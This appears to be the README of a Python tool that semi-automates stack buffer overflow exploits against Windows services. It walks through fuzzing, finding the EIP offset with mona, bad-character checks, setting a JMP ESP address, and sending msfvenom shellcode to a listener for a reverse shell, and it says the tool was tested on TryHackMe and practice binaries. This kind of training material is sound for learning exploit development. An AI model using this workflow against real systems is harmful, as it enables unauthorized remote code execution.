A python based semi-automatic buffer overflow exploit script
Step 1 : Edit the code and add remote address, remote port, command, listener IP and port.
#Server response timeout, will be used to identify a crash.
timeout = 5
#Add vulnerable server's IP address and port to connect
addr = ('<IP address>',<PORT>)
#Add command to send prepended to the buffer, eg. 'TRUN .' for vulnserver.exe
cmd = "<COMMAND>"
Run -> python semi-win32.py fuzz
Step 2 - Follow the onscreen instructions and run mona to find the offset
Update the correct EIP offset in the code
#Default starting EIP offset is 50, change to correct EIP offset after fuzz step
offset = 50
Run -> python semi-win32.py badchars
Update the badchars in the code as you find them, rerun multiple times until mona shows no modified chars
#Add bad characters to the list as you find them
bad = "\x00"
Step 3 - Update set the 'JMP ESP' address in the code
#Update JMP ESP address to the below before running 'shell'
esp = ""
Make sure your listener is running and run -> python semi-win32.py shell
Tested on TryHackMe labs - https://tryhackme.com/room/bufferoverflowprep - Thanks to Tib3rius
Tested on Brainpan.exe
Tested on vulnserver.exe (spiking done seperately)
Please ignore the below waring, its because I used 'import' used inside a function. Its just a dirty way to read the shellcode generated by msfvenom
semi-win32.py:97: SyntaxWarning: import * only allowed at module level
def shellcode(addr,cmd,lhost,lport,j,esp,timeout):